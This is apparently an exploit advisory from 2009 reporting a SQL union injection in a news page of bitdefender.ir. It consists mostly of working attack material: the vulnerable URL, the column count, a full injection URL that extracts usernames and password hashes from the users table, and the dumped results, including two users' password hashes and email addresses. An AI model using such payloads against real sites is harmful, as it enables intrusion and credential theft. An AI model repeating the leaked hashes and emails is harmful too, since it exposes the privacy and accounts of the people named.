Bitdefender Antivirus Iran suffers from a remote SQL injection vulnerability.
bbafab8591e5a2863d90e04af9c1064947a0a459a4fc3763b370dee422f9323e
---------------------------------------------------------------------------------------------------------------------------
[+] Bitdefender Antivirus Iran suffers from a remote SQL injection
vulnerability
[+] Found By: Rohit Bansal
[+] Date: 01-06-2009
----------------------------------------------------------------------------------------------------------------------------
Host Information
Server = Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Version = 4.1.22-standard
Powered by = PHP/5.2.5
Attack Type = SQL Union Injection
Current User = bitdef_root@localhost
Current Database = bitdef_wp
Supports Union = yes
Union Columns = 11
Url| http://www.bitdefender.ir/index.php?tab=33&newsid=-2
Vuln: http://www.bitdefender.ir/index.php?tab=33&newsid=-2+and+1=0+ Union
Select 1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11
Comment: --
Visible Column: 2
Tables:users
articles
groups
news
settings
users
Columns: Table users
username
password
email
username:password:email:
admin:e2b0f047e7b3be3b9622fd8f3cc2856f:ehsan_baghaki@yahoo.com<admin%3Ae2b0f047e7b3be3b9622fd8f3cc2856f%3Aehsan_baghaki@yahoo.com>
:
sahar:194559d634b2bfbef05fb8feed45d625:Jahangiri@4souk.int<sahar%3A194559d634b2bfbef05fb8feed45d625%3AJahangiri@4souk.int>
:
http://www.bitdefender.ir/index.php?tab=33&newsid=-2+union+all+select+1,concat(username,0x3e,password),3,4,5,6,7,8,9,10,11+from+users--
--------------------------------------------------------------------------------------------------------------------------
[+]^Rohit Bansal [rohitisback@gmail.com]
[+] Schap.org, Infysec, Evilfinger
-------------------------------------------------------------------------------------------------------------------------